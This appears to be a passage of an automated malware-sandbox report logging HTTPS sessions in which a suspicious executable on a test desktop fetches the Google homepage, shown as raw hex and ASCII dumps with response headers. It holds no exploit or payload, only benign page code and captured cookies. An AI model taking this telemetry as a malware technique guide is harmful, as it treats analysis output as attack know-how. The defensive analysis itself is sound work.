                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC197INData Raw: 34 37 63 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d
                                                                                                                                                                                                                            Data Ascii: 47c8<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has m
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64
                                                                                                                                                                                                                            Data Ascii: any special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 35 38 2c 31 31 2c 31 34 38 2c 31 2c 33 2c 37 38 36 2c 31 2c 36 2c 33 33 39 2c 35 30 37 2c 38 38 2c 32 32 33 2c 32 36 35 2c 31 35 31 2c 32 37 35 2c 31 2c 38 36 2c 36 38 31 2c 31 2c 33 31 2c 33 35 36 2c 32 2c 32 33 38 2c 38 37 33 2c 32 32 31 2c 36 31 2c 31 34 32 2c 34 36 35 2c 32 2c 37 2c 31 2c 31 32 37 2c 36 33 2c 31 38 31 2c 33 34 36 2c 35 36 39 2c 32 33 34 2c 33 36 2c 35 36 33 2c 32 35 37 2c 33 31 35 2c 31 33 36 2c 32 31 31 2c 31 36 35 39 2c 33 32 35 2c 32 30 31 2c 34 37 31 2c 32 34 36 2c 38 30 33 2c 31 37 2c 33 2c 33 32 30 2c 31 30 32 2c 33 2c 32 35 30 2c 31 30 36 2c 31 37 35 36 2c 39 31 33 2c 31 35 31 2c 32 2c 35 32 32 2c 31 36 35 2c 33 2c 39 2c 34 30 39 2c 36 39 30 2c 35 33 34 2c 33 38 30 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 33 2c 34 34 2c 36 38 33
                                                                                                                                                                                                                            Data Ascii: 58,11,148,1,3,786,1,6,339,507,88,223,265,151,275,1,86,681,1,31,356,2,238,873,221,61,142,465,2,7,1,127,63,181,346,569,234,36,563,257,315,136,211,1659,325,201,471,246,803,17,3,320,102,3,250,106,1756,913,151,2,522,165,3,9,409,690,534,380,1,5,4,4,4,163,44,683
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6f 6f 67 6c 65 2e 67 65 74 45 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c
                                                                                                                                                                                                                            Data Ascii: oogle.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 3d 3d 3d 22 31 22 3b 62 72 65 61 6b 20 61 7d 61 3d 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69
                                                                                                                                                                                                                            Data Ascii: ==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-ri
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 31 3b 74 6f 70 3a 2d 31 70 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42
                                                                                                                                                                                                                            Data Ascii: olute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.B
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6f 72 3a 23 62 65 62 65 62 65 3b 63 6f 6c 6f 72 3a 23 33 36 63 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f
                                                                                                                                                                                                                            Data Ascii: or:#bebebe;color:#36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 39 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e
                                                                                                                                                                                                                            Data Ascii: w{display:inline-block;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d
                                                                                                                                                                                                                            Data Ascii: 0 !important;font-weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 6c 7d 23 67 62 70 6d 20 2e 67 62 70 6d 74 63 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d
                                                                                                                                                                                                                            Data Ascii: l}#gbpm .gbpmtc{border-top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbm


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            19192.168.2.749723142.250.186.1004435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:12 GMT
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-A9tJJcBwmSBNDXqhILB-MQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Set-Cookie: AEC=AZ6Zc-VjvEzPF6E0hSlw-885itwHdnTxY5zjtPjwbhHMVc-OYx3fKPOkug; expires=Sun, 13-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                            Set-Cookie: NID=520=SIbpfO489nBiGWmTp5_-U1Gyk3m4MFBZKG12cpCkOBzw4XXtY9NPkSWZFqMNOUYSRl7Ghe0RxMwCqsVg9_Zqerbtrm-ON50Jjf2_9EUhmhjTZqXxcJdwLBbhN1GGlzBRR6TDG-VYIIasiELM0EjTDmtb0zD4w86jbIQmvrqGbDys1BAcj_b9I50w_U3ha4-lCAIqbf5S-Q; expires=Wed, 16-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC200INData Raw: 34 64 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79
                                                                                                                                                                                                                            Data Ascii: 4d9d<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f
                                                                                                                                                                                                                            Data Ascii: special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_co
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 32 35 31 2c 32 32 38 2c 32 2c 37 2c 35 36 2c 31 39 36 2c 31 37 38 2c 37 34 2c 31 34 32 2c 36 30 32 2c 36 31 2c 31 39 33 2c 39 30 36 2c 32 30 33 2c 32 2c 32 38 2c 35 39 39 2c 32 35 37 2c 34 35 32 2c 32 30 38 2c 31 33 33 33 2c 36 35 33 2c 32 30 31 2c 31 32 30 39 2c 32 39 30 2c 31 37 2c 33 2c 33 33 39 2c 34 2c 34 35 38 2c 32 31 2c 32 30 31 39 2c 35 2c 35 2c 36 31 39 2c 31 34 39 2c 32 2c 35 32 36 2c 31 36 34 2c 33 2c 32 38 32 2c 31 33 36 2c 31 36 30 34 2c 31 2c 35 2c 34 2c 34 2c 34 2c 38 35 2c 37 37 2c 37 32 37 2c 36 34 37 2c 33 2c 32 31 39 2c 35 30 30 2c 31 30 34 2c 31 39 35 2c 33 34 32 2c 31 32 2c 31 2c 31 2c 38 30 2c 32 32 34 2c 35 36 2c 33 32 2c 35 32 38 2c 38 31 2c 32 33 2c 32 2c 31 2c 32 2c 32 2c 32 2c 33 2c 32 37 2c 31 34 2c 38 33 32 2c 36 37 34 2c 35
                                                                                                                                                                                                                            Data Ascii: 251,228,2,7,56,196,178,74,142,602,61,193,906,203,2,28,599,257,452,208,1333,653,201,1209,290,17,3,339,4,458,21,2019,5,5,619,149,2,526,164,3,282,136,1604,1,5,4,4,4,85,77,727,647,3,219,500,104,195,342,12,1,1,80,224,56,32,528,81,23,2,1,2,2,2,3,27,14,832,674,5
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                            Data Ascii: unction(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a
                                                                                                                                                                                                                            Data Ascii: >#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c 30 2f 3b 72 69 67 68 74 3a 35 70 78 5c 30 2f 3b 62 6f 74 74 6f
                                                                                                                                                                                                                            Data Ascii: rder-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\0/;botto
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61
                                                                                                                                                                                                                            Data Ascii: #fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gsta
